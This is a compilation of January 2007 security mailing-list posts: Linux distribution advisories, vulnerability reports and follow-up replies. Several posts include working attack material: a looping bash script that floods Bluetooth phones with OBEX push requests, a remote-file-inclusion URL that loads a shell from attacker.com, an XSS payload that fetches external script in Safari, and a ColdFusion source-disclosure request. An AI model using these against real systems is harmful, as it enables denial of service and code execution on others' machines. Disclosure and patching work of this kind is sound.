[ GLSA 200701-16 ] Adobe Acrobat Reader: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200701-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Acrobat Reader: Multiple vulnerabilities Date: January 22, 2007 Bugs: #159874 ID: 200701-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Adobe Acrobat Reader is vulnerable to remote code execution, Denial of Service, and cross-site scripting attacks. Background == Adobe Acrobat Reader is a PDF reader released by Adobe. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-text/acroread7.0.9 = 7.0.9 Description === Adobe Acrobat Reader in stand-alone mode is vulnerable to remote code execution via heap corruption when loading a specially crafted PDF file. The browser plugin released with Adobe Acrobat Reader (nppdf.so) does not properly handle URLs, and crashes if given a URL that is too long. The plugin does not correctly handle JavaScript, and executes JavaScript that is given as a GET variable to the URL of a PDF file. Lastly, the plugin does not properly handle the FDF, xml, xfdf AJAX request parameters following the # character in a URL, allowing for multiple cross-site scripting vulnerabilities. Impact == An attacker could entice a user to open a specially crafted PDF file and execute arbitrary code with the rights of the user running Adobe Acrobat Reader. An attacker could also entice a user to browse to a specially crafted URL and either crash the Adobe Acrobat Reader browser plugin, execute arbitrary JavaScript in the context of the user's browser, or inject arbitrary HTML or JavaScript into the document being viewed by the user. Note that users who have emerged Adobe Acrobat Reader with the nsplugin USE flag disabled are not vulnerable to issues with the Adobe Acrobat Reader browser plugin. Workaround == There is no known workaround at this time. Resolution == All Adobe Acrobat Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-text/acroread-7.0.9 References == [ 1 ] CVE-2006-5857 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5857 [ 2 ] CVE-2007-0044 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0044 [ 3 ] CVE-2007-0045 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0045 [ 4 ] CVE-2007-0046 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0046 [ 5 ] CVE-2007-0048 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0048 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200701-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpQsfVWgDNiY.pgp Description: PGP signature
Re: Re: Re: SMF index.php?action=pm Cross Site-Scripting
This bug has been tested on the versions SMF 1.1.1 and 1.1 RC3. Aria-Security Team http://aria-security.net
Re: Fantastic News =- (news.php) Remote File Include Vulnerability - bogus... again
Author: BorN To K!LL Maybe this person should be called BorN To Gr3p or BorN To Post Fake and Pointl3ss ExploiTz! ### Bug in :. news.php code : require_once($CONFIG['script_path'].functions/functions.php); require_once($CONFIG['script_path'].functions/mysql.php); require_once($CONFIG['script_path'].functions/template.php); Two lines above the previous code is the following two lines: unset($CONFIG); require_once(config.php); Once again... security auditing via grep doesn't give you enough information to post a complete and accurate bug/security report. Honestly, do you have a bash one liner that you just feed scripts to, that generates these bogus and pointless reports? It is getting to the point where I almost don't bother to check the code any more. GreeTz to :. M4d pr0ps to vim, grep and sed.
rPSA-2007-0011-1 wget
rPath Security Advisory: 2007-0011-1 Published: 2007-01-23 Products: rPath Linux 1 Rating: Informational Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: wget=/[EMAIL PROTECTED]:devel//1/1.10.2-4-0.1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6719 https://issues.rpath.com/browse/RPL-930 Description: Previous versions of the wget package can crash if they contact a malicious FTP server. No further vulnerability is enabled by this minor flaw; system security is not threatened in any way.
[ MDKSA-2007:024 ] - Updated kdegraphics packages fix crafted pdf file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:024 http://www.mandriva.com/security/ ___ Package : kdegraphics Date: January 22, 2007 Affected: 2007.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2, kpdf in KDE before 3.5.5, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104 ___ Updated Packages: Mandriva Linux 2007.0: 0cd41c0355a39824f669cac0c5013169 2007.0/i586/kdegraphics-3.5.4-7.2mdv2007.0.i586.rpm 6a9e0d68fe53b0886210de67360eed3f 2007.0/i586/kdegraphics-common-3.5.4-7.2mdv2007.0.i586.rpm 470dc3c84192a915d1a318168aa3cc64 2007.0/i586/kdegraphics-kcolorchooser-3.5.4-7.2mdv2007.0.i586.rpm 32e05dc7c4ae0a78ccf8fbb22712fce8 2007.0/i586/kdegraphics-kcoloredit-3.5.4-7.2mdv2007.0.i586.rpm 7379e6974d963f5f19e4485f98c4c75a 2007.0/i586/kdegraphics-kdvi-3.5.4-7.2mdv2007.0.i586.rpm 31025f05167cf00dc9f9aa8cdd9ae9ea 2007.0/i586/kdegraphics-kfax-3.5.4-7.2mdv2007.0.i586.rpm 1194b194a06049d9b6c40b7df89d25c0 2007.0/i586/kdegraphics-kghostview-3.5.4-7.2mdv2007.0.i586.rpm 8768ca0900e75182cd6ebb603ac81d0d 2007.0/i586/kdegraphics-kiconedit-3.5.4-7.2mdv2007.0.i586.rpm 86bf695e519c6fd20ca7a454bbe3f6f8 2007.0/i586/kdegraphics-kolourpaint-3.5.4-7.2mdv2007.0.i586.rpm 2f7eecf73812c0196f7d3c70e5fc8a38 2007.0/i586/kdegraphics-kooka-3.5.4-7.2mdv2007.0.i586.rpm 985c0a645812377949177d6e07283556 2007.0/i586/kdegraphics-kpdf-3.5.4-7.2mdv2007.0.i586.rpm 247591ab0e437c25d46d755a622c4a6a 2007.0/i586/kdegraphics-kpovmodeler-3.5.4-7.2mdv2007.0.i586.rpm e6857a3e30e06fce42f8a63331d0d04c 2007.0/i586/kdegraphics-kruler-3.5.4-7.2mdv2007.0.i586.rpm dbc566e75a97fa4d54fb4c96d2171868 2007.0/i586/kdegraphics-ksnapshot-3.5.4-7.2mdv2007.0.i586.rpm 0ae8ec2f105b1797eed7f14fe1f972a1 2007.0/i586/kdegraphics-ksvg-3.5.4-7.2mdv2007.0.i586.rpm 0a1be40a56fb46bed7320cca4f6795cc 2007.0/i586/kdegraphics-kuickshow-3.5.4-7.2mdv2007.0.i586.rpm f1862b323da63bdf4a5ee82649f64f6d 2007.0/i586/kdegraphics-kview-3.5.4-7.2mdv2007.0.i586.rpm 08474806d83e756759f7f9a50a57eb63 2007.0/i586/kdegraphics-mrmlsearch-3.5.4-7.2mdv2007.0.i586.rpm 92aafc29e6a8663ada111b622f4966f4 2007.0/i586/libkdegraphics0-common-3.5.4-7.2mdv2007.0.i586.rpm 18e12acc104fef371ee43754a1ef9f82 2007.0/i586/libkdegraphics0-common-devel-3.5.4-7.2mdv2007.0.i586.rpm 4d9ba15dc6ca92ae0d33cf382c60447b 2007.0/i586/libkdegraphics0-kghostview-3.5.4-7.2mdv2007.0.i586.rpm 533fe072755ab1cad0a841f7f5923882 2007.0/i586/libkdegraphics0-kghostview-devel-3.5.4-7.2mdv2007.0.i586.rpm 954bd2bb51edbdb9b9139a8e30b0f7b5 2007.0/i586/libkdegraphics0-kooka-3.5.4-7.2mdv2007.0.i586.rpm 3c0e6cc9b6f7d19fd261faacca8a0d80 2007.0/i586/libkdegraphics0-kooka-devel-3.5.4-7.2mdv2007.0.i586.rpm c4183748519d66a0fce222e667b40a07 2007.0/i586/libkdegraphics0-kpovmodeler-3.5.4-7.2mdv2007.0.i586.rpm 8b00015eb9b5fd80942ce7bd90dabb81 2007.0/i586/libkdegraphics0-kpovmodeler-devel-3.5.4-7.2mdv2007.0.i586.rpm 52472c010fff010454288391902a6e6d 2007.0/i586/libkdegraphics0-ksvg-3.5.4-7.2mdv2007.0.i586.rpm 61c8ca7bf0e5ae26d5d93b0f3b472a34 2007.0/i586/libkdegraphics0-ksvg-devel-3.5.4-7.2mdv2007.0.i586.rpm ef27b1287e78a14f9ccc3a76b9255052 2007.0/i586/libkdegraphics0-kview-3.5.4-7.2mdv2007.0.i586.rpm 5bd75a572c9e1762af0def657b497f41 2007.0/i586/libkdegraphics0-kview-devel-3.5.4-7.2mdv2007.0.i586.rpm 6f2928e61268d085e710f68ef577ed36 2007.0/SRPMS/kdegraphics-3.5.4-7.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 0ce936615224ead11ac475808691a56f 2007.0/x86_64/kdegraphics-3.5.4-7.2mdv2007.0.x86_64.rpm 3320412a840fab74c6c2bd9f6efd909a 2007.0/x86_64/kdegraphics-common-3.5.4-7.2mdv2007.0.x86_64.rpm 15b9efa532fc48c71d21fc721ee43158 2007.0/x86_64/kdegraphics-kcolorchooser-3.5.4-7.2mdv2007.0.x86_64.rpm 7dadfafb418caca77be62eee0487d12b 2007.0/x86_64/kdegraphics-kcoloredit-3.5.4-7.2mdv2007.0.x86_64.rpm 4654670d37cb55420f6e3368b504726c 2007.0/x86_64/kdegraphics-kdvi-3.5.4-7.2mdv2007.0.x86_64.rpm 3a50b066541f2359a0b09a0fd0bb4475 2007.0/x86_64/kdegraphics-kfax-3.5.4-7.2mdv2007.0.x86_64.rpm 6c14c3639571fc0fd8cf022efdeca5ea
Bluetooth DoS by obex push
Hello, during a course project studying security and privacy related to Bluetooth, we discovered a simple but effective DoS attack using OBEX push. Using ussp-push [1], it is possible to send out files very quickly. By continuously trying to push a #64257;le, the target is #64258;ooded with prompts whether to accept the #64257;le or not, which disables any other usage on the phone, including the ability to turn off Bluetooth. We confirmed the attack to work on the following phones: - Sony Ericsson K700i - Nokia N70 - Motorola MOTORAZR V3 - Sony Ericsson W810i - LG Chocolate KG800 and expect nearly all available phones with Bluetooth to be vulnerable (in contrary to the previous DoS by l2ping). A proof-of-concept code is attached, using ussp-push and targeting a known MAC. This could be easily extended to target all visible devices. Plus, a user could be forced to accept a possibly malicious file with this attack. Using only one Bluetooth-Dongle, we were able to practically disable three phones simlutaneously. Best regards, Stefan Ekerfelt and Armin Hornung [1] http://www.xmailserver.org/ussp-push.html
Bluetooth DoS by obex push
Hello,
during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.
Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a file, the target is flooded with prompts
whether to accept the file or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:
- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800
and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).
A proof-of-concept code is attached (plain text), using ussp-push and
targeting a known MAC. This could be easily extended to target all
visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simlutaneously.
Best regards,
Stefan Ekerfelt and Armin Hornung
[1] http://www.xmailserver.org/ussp-push.html
#!/bin/bash
checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test $OCHAN !=
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}
if test $# -ne 2
then
echo Usage: $0 bdaddr filename
exit 127
fi
MAC=$1
FILENAME=$2
checkOPUSH $1
OCHAN=$?
if test $OCHAN -eq 0
then
echo Couldn't connect to $MAC via OBEX push.
exit 127
fi
while true
do
./ussp-push [EMAIL PROTECTED] $FILENAME $FILENAME
done
xss filter to protect from xss attacks
I have created a xss filter to protect from xss attacks. Though i have filtered only for 8 characters but i was able to test against all the attacks mentioned in the RSnake's cheat sheet. Appscan was not able to detect any xss attacks on it. I request the application security community to help test this filter. 90% i am sure that you wont be able to perform any xss attack on it, the rest 10% i will find out after the feedback from the community. For the curious mind, it is written in java In case if you are successful in performing xss attack, please do reply to this email with your name, browser and the xss attack string. url - http://www.attacklabs.com/xssfilter/ I appreciate your time and effort. Thanks a lot in advance regards Anurag
Safari Improperly Parses HTML Documents BlogSpot XSS vulnerability
Overview: Safari on occasions may improperly parse the source of an HTML document, which can lead to the execution of html tags within comments. This can become dangerous when input filters allow html tags within comments, as they will get parsed and executed under certain circumstances. Details: In some cases you can cause Apple’s Safari browser to execute code when it should not be executed. In the following example everything within the comment, in theory should never be executed; however, safari decides to execute the script tag. titlemyblog!--/title/headbodyscript src=http://beanfuzz.com/ bean.js --/title Blogs hosted on BlogSpot.com have filter mechanisms for their input; however, they will allow you to inject anything within comments. This made it possible to cross site script blogspot.com. Note: Only Safari viewers will be affected. Proof of concept: http://dirtybean1234.blogspot.com/ Initial release of vulnerability: http://www.beanfuzz.com/wordpress/? p=99 Vendor Response: I was unable to get a response from the vendor in regards to this issue Questions / Comments: Jose (at) onzra (dot) com Register for my RSA 2007 Training Course Creative Web Protocol Attacks, Beyond Web Hacking February 4, 5 2007 San Francisco https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp
Re: Multiple OS kernel insecure handling of stdio file descriptor
SP == Shiva Persaud [EMAIL PROTECTED] writes: XFOCUS team (http://www.xfocus.org/) had discovered Multiple OS kernel insecure handling of stdio file descriptor. === Affected OS Version AIX 5.3 SP The AIX Security Team can be reached at [EMAIL PROTECTED] SP We have investigated this issue and AIX is not affected. A privileged SP process will not inherit closed file descriptors for stdio, stdout and SP stderr. well, but what is used for stdout if it's closed in the parent process just before fork(2) call?! -- Yours sincerely, Eugeny. Doctor Web, Ltd. http://www.drweb.com
rPSA-2007-0012-1 ed
rPath Security Advisory: 2007-0012-1 Published: 2007-01-23 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Local User Non-deterministic Vulnerability Updated Versions: ed=/[EMAIL PROTECTED]:devel//1/0.4-1-0.1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6939 https://issues.rpath.com/browse/RPL-962 Description: Previous versions of the ed package are vulnerable to a symlink attack which allows a local attacker to overwrite arbitrary files writeable by the user running ed with contents provided by the user running the ed program.
Adobe ColdFusion Information Disclosure
Hi people, I was wondering whether I was right or not about this vuln: http://www.securityfocus.com/bid/21978 Unfortunately, I don't have a Colfusion to test on.. What I would do is: http://colfusion-server/an-existing-file.cfm%2500.cfm and I expect the server to spit out the source code Am I right here? Did anybody try this out? If so, how did you do it? Thank you. Cheers, Mateo
AToZed Software Intraweb Component for Borland Delphi and Kylix DoS vulnerability
Type: Deniel of Service Severity: Critical Title: AToZed Software IntraWeb Component for Borland Delphi and Kylix DoS vulnerability Date: January 23, 2007 Synopsys A DoS vulnerability exists in the IntraWeb Component of AToZed Software. Background - IntraWeb is a RAD component for Borland Delphi and Kylix by AToZed Software, which allows developers to rapidly develop webapplication. This component is commonly used by Borland developers internationally. Description --- DoS conditions occurs, when a specially crafted HTTP request is sent to the webapplication. After the request, the affected thread enters into an infinte loop, and hangs. Under IIS 5.x, the thread will never be stopped. Under IIS 6 the webserver automatically stops the thread after the configured amount of time, or CPU usage. Impact -- An attack can cause the webapplication to slow down, and after more specially crafted request, to stop processing requests. WorkAround -- There is no vendor supplied workaround for the problem at this time. A possible workaround can be, to filter the request body for the special request, and repair it. It can be achieved, by overriding the function called OnBeforeDispatch of the TIWServerController object, and repair the request, by changing the Request.Content field. Affected versions - IntraWeb 8.0 and lower versions Vulnerability timeline -- 2006.08. - Vendor notified, but no answer 2007.01.23 - Vulnerability publicly available Discovery is credited to: C0r31mp4ct
Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability
Could you please provide more details about this vulnerability ? Especially which versions are affected :-) Kind regards, Marek Kroemeke
Re: phpAdsNew 2.0.7 Remote File Include
what ? no bug there ? can u give us proof ! examples !! thanks by [EMAIL PROTECTED] l.d.0
rPSA-2007-0015-1 libsoup
rPath Security Advisory: 2007-0015-1 Published: 2007-01-23 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Denial of Service Updated Versions: libsoup=/[EMAIL PROTECTED]:devel//1/2.2.99-1-0.1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5876 https://issues.rpath.com/browse/RPL-965 Description: Previous versions of the libsoup package are vulnerable to an indirect denial of service in which a malicious or faulty server responds to requests with malformed HTTP headers, causing the application that uses libsoup to crash.
Re: Windows logoff bug possible security vulnerability and exploit.
Dear Rage Coder, I think this is a now problem, see Microsoft knowledge base article 837115: http://support.microsoft.com/kb/837115 Microsoft recommend to use User Profile Hive Cleanup Service: http://www.microsoft.com/downloads/details.aspx?FamilyID=1B286E6D-8912-4E18-B570-42470E2F3582displaylang=en Can you tel me of this helps solving your problem? Greetz Bart Rage Coder wrote: The problem only occurs at times. To reproduce the problem, I just use the computer normally, and at each logon check the event viewer and running processes to see if a profile unload failed. I don't have any special terminal software or other logon software installed. I find that if I wait for a little bit after logging off before logging on again, no running programs from the previous logon are present, but if I log on just after logging off, they will be if the profile unload fails. That still shouldn't be the case. My brother frequently goes on his account right after I go off; there shouldn't be a time limit to wait in order to prevent this. I noticed an interesting thing about XP and fast user switching which would likely stop this problem. When logging on, the first logged on user is given session ID 0, as shown in task manager, but if I 'switch' to another user, the user is given a different session ID. It seems that no two users are given the same session ID when using fast user switching. But when logging off all users and then back on, it is back to session 0. And if I just log on as a user, log off, and then on as another user without using the 'switch user', they both are session ID 0. The same thing happens when using classic logon and on 2003. All logons are given session ID 0. I did some reading in the platform SDK and some sites about stuff, and it seems that these sessions literally create an isolation. Messages sent from a process in one session ID are not visible to processes in another, windows created only appear on the desktop associated with that session of the process that created the window, etc. Ideally, running classic logon always as session 0 'should' work because ideally when logging of, the processes ran 'should' close, so the next user to log on would have nothing to access. But this does not appear to be the case at all times. A few moments ago I logged in as administrator to do some minor changes, and I ran EPIM to take some notes of things. When I logged of and back on as a regular using, 'explorer.exe', 'essentialpim.exe', 'seamonkey.exe' were still running as Administrator, event viewer showed the usual UserEnv messages, and EPIM appeared on the system tray. My guess is something like this happens: Logon Administrator : Session ID 0 Run EssentialPIM : Session ID 0 Do some stuff Logoff Administrator : Profile unload fails, a few programs continue running Logon Normal User : Session ID 0 Explorer runs, and at startup broadcasts 'TaskbarCreated' message All processes in session 0 get this message, EPIM adds system tray icon like it is supposed to If each logon, even in classic mode, is given a separate session ID as is done in fast user switching, this would not happen, even if the profile unload fails and the programs continue to run waiting for the profile to unload: Logon Administrator : Session ID 0 Run EssentialPIM : Session ID 0 Do some stuff Logoff Administrator : Profile unload fails, a few programs continue running Logon Normal User : Session ID 1 Explorer runs, and at startup broadcasts 'TaskbarCreated' message All processes in session 1 get this message Programs that may continue to run in session 0 are isolated If I log on as administrator again, it would be ok to reuse session 0, but for a given boot, no two users should be assigned the same logon session ID. I.E. if I log on as Normal User again, it would be session 1, etc. This would not prevent a profile from failing to unload, and would not prevent the processes from continuing to run, but it will prevent a user from a later logon from accessing the processes in the current logon. [EMAIL PROTECTED] wrote: Dear Rage Coder, I've seen unloaded profiles for many times, but I never saw application still running after logoff. Profile itself doesn't create security vulnerability, since it can not be accessed by another user. What do you use to reproduce this vulnerability? Are you sure you do not use some different software which affects logon/logoff process, e.g. 3rd party terminal software or some security enhancement? _ Valentines Day -- Shop for gifts that spell L-O-V-E at MSN Shopping http://shopping.msn.com/content/shp/?ctId=8323,ptnrid=37,ptnrdata=24095tcode=wlmtagline
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
-- [ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion -- Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : January, 21st 2007 Location : Indonesia, Jakarta web : http://echo.or.id/adv/adv62-y3dips-2007.txt Critical Lvl : Critical -- Affected software description: ~~~ Application : Upload Service version : 1.0 URL : http://bild-bearbeiten.de/ Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip --- 1. Install directory are not being remove after installation process 2. Variables $maindir in top.php are not properly sanitized. ---top.php ... include($maindir.config.php); include($maindir.functions/error.php); ... -- When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~ http://target.com/upload/top.php?maindir=http://attacker.com/shell.php? Solution: ~~ - Remember to remove your install directory and change config.php permission - Simply Sanitize variable $maindir on affected files. (eg. $maindir= ;) - Turn off register_globals Notification: ~ vendor not contact yet --- Shoutz: ~ my lovely ana ~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff ~ [EMAIL PROTECTED] ~ #e-c-h-o @irc.dal.net -- Contact: ~ y3dips|| echo|staff || y3dips[at]gmail[dot]com Homepage: http://y3dips.echo.or.id/ [ EOF ] -
rPSA-2007-0014-1 libgtop
rPath Security Advisory: 2007-0014-1 Published: 2007-01-23 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local User Deterministic Denial of Service Updated Versions: libgtop=/[EMAIL PROTECTED]:devel//1/2.12.0-1.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235 https://issues.rpath.com/browse/RPL-972 Description: Previous versions of the libgtop package are vulnerable to an attack in which a local user can at least cause programs that use libgtop (such as gnome-system-monitor) to crash, and possibly to execute arbitrary code as the user running the program.
[ MDKSA-2007:025 ] - Updated kernel packages fix multiple vulnerabilities and bugs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:025 http://www.mandriva.com/security/ ___ Package : kernel Date: January 23, 2007 Affected: Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: The 2.6 kernel prior to 2.6.12 allows remote attackers to poison the bridge forwarding table using frames that have already been dropped by filtering, which can cause the bridge to forward spoofed packets (CVE-2005-3272). Prior to 2.6.15.5, the kernel allows local users to cause a DoS (endless recursive fault) via unknown attack vectors related to a bad elf entry address on Intel processors (CVE-2006-0741). A race condition in the socket buffer handling in the 2.6.9 kernel and earlier versions could allow a remote attacker to cause a DoS (crash) (CVE-2006-2446). Stephane Eranian discovered an issue with permon2.0 where, under certain circumstances, the perfmonctl() system call may not correctly manage the file descriptor reference count, resulting in the system possibly running out of file structure (CVE-2006-3741). Prior to and including 2.6.17, the Universal Disk Format (UDF) filesystem driver allowed local users to cause a DoS (hang and crash) via certain operations involving truncated files (CVE-2006-4145). Various versions of the Linux kernel allowed local users to cause a DoS (crash) via an SCTP socket with a certain SO_LINGER value, which is possibly related to the patch used to correct CVE-2006-3745 (CVE-2006-4535). The __block_prepate_write function in the 2.6 kernel before 2.6.13 does not properly clear buffers during certain error conditions, which allows users to read portions of files that have been unlinked (CVE-2006-4813). The clip_mkip function of the ATM subsystem in the 2.6 kernel allows remote attackers to dause a DoS (panic) via unknown vectors that cause the ATM subsystem to access the memory of socket buffers after they are freed (CVE-2006-4997). The seqfile handling in the 2.6 kernel up to 2.6.18 allows local users to cause a DoS (hang or oops) via unspecified manipulations that trigger an infinite loop while searching for flowlabels (CVE-2006-5619). A missing call to init_timer() in the isdn_ppp code of the Linux kernel can allow remote attackers to send a special kind of PPP pakcet which may trigger a kernel oops (CVE-2006-5749). The aio_setup_ring() function initializes a variable incorrectly which can be used in error path to free allocated resources which could allow a local user to crash the node (CVE-2006-5754). A vulnerability in the bluetooth support could allow for overwriting internal CMTP and CAPI data structures via malformed packets (CVE-2006-6106). The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels immediately and reboot to effect the fixes. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3272 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0741 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2446 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4145 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4535 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4813 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5749 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5754 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6106 ___ Updated Packages: Corporate 3.0: c807857c820dae84bad9beac5ff132c2 corporate/3.0/i586/kernel-2.6.3.36mdk-1-1mdk.i586.rpm 9502a05c5049f394b50a4f2128ca7311 corporate/3.0/i586/kernel-BOOT-2.6.3.36mdk-1-1mdk.i586.rpm 26b4a92d5ed2c1953fb88fd304584281 corporate/3.0/i586/kernel-doc-2.6.3-36mdk.i586.rpm c2f4619bf4b4d9d3952ccad7eb4be16d corporate/3.0/i586/kernel-enterprise-2.6.3.36mdk-1-1mdk.i586.rpm 20970c40ded39599c4ad6bc976447c8c corporate/3.0/i586/kernel-i686-up-4GB-2.6.3.36mdk-1-1mdk.i586.rpm 5856cd990d971667d673216603cc9b1f corporate/3.0/i586/kernel-p3-smp-64GB-2.6.3.36mdk-1-1mdk.i586.rpm 0e978fa73922d870b487c2f8d14eaff3 corporate/3.0/i586/kernel-secure-2.6.3.36mdk-1-1mdk.i586.rpm fa9f0cdd42385ec68aa79198d2615617
Re: Multiple SQL injections and XSS in FishCart 3.1
I am the principal behind FishCart, discussed in the above advisory. I found tonight after posting to bugtraq about another reported problem that this previous bug is reported as unpatched. As best we could determine the post from dcrab was not accurate regarding the SQL injection claims. The original post at http://www.securityfocus.com/archive/1/397484 shows invalid sql statements, not sql injection. We found that the URL he had posted was not normal and turned up a coding bug that explained the SQL errors, but there was no SQL injection. We also had some trouble reproducing some of the XSS errors. That said, we took the claims seriously and immediately went to work to improve error hardening. A fix was worked out among the developers and incorporated into the source in mid May 2005. A version 3.x patch was derived from the source changes and sent to the FishCart mailing list on May 21, 2005 for installed FishCarts. This post can be seen at http://www.fishcart.org/archives/200505/msg00028.html. You will need to log in with username 'speak', password 'friend' to see the post. While we have continued to refine the process, we think it fair that the patch has been available since that date. Please update your advisory to reflect this information. If you have any further questions please feel free to contact me at your convenience to verify my identity or for further details on the fixes. Thank you for your attention to this matter. Michael Brennen President, FishNet, Inc. [EMAIL PROTECTED] 972.669.0041
Re: DoS against AVM Fritz!Box 7050 (and others)
A new FW version with the fix is released: ftp://ftp.avm.de/fritz.box/fritzbox.fon_wlan_7050/firmware/ Matthias [EMAIL PROTECTED] wrote: Denial of Service against AVM Fritz!Box 7050 (and others) Discovered by: Matthias Wenzel Advisory: http://mazzoo.de/blog/2007/01/18#FritzBox_DoS Manufacturer: AVM (www.avm.de) Product: Fritz!Box 750 (and others) Vendor was notified 6 month ago (see blog entry by Matthias) Sending a zero-length UDP packet to port 5060 (SIP) of a AVM Fritz!Box will crash the VoIP-telephony application. This works from any IP-interface, including the DSL line. Collin (only delivering the message to FD and BugTraq)
[ GLSA 200701-18 ] xine-ui: Format string vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200701-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xine-ui: Format string vulnerabilities Date: January 23, 2007 Bugs: #161558 ID: 200701-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis xine-ui improperly handles format strings, possibly allowing for the execution of arbitrary code. Background == xine-ui is a skin-based user interface for xine. xine is a free multimedia player. It plays CDs, DVDs, and VCDs, and can also decode other common multimedia formats. Affected packages = --- Package / Vulnerable /Unaffected --- 1 xine-ui 0.99.5_pre20060716= 0.99.5_pre20060716 Description === Due to the improper handling and use of format strings, the errors_create_window() function in errors.c does not safely write data to memory. Impact == An attacker could entice a user to open a specially crafted media file with xine-ui, and possibly execute arbitrary code. Workaround == There is no known workaround at this time. Resolution == All xine-ui users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-video/xine-ui-0.99.5_pre20060716 References == [ 1 ] CVE-2007-0254 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0254 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200701-18.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpNy2aB7zikc.pgp Description: PGP signature
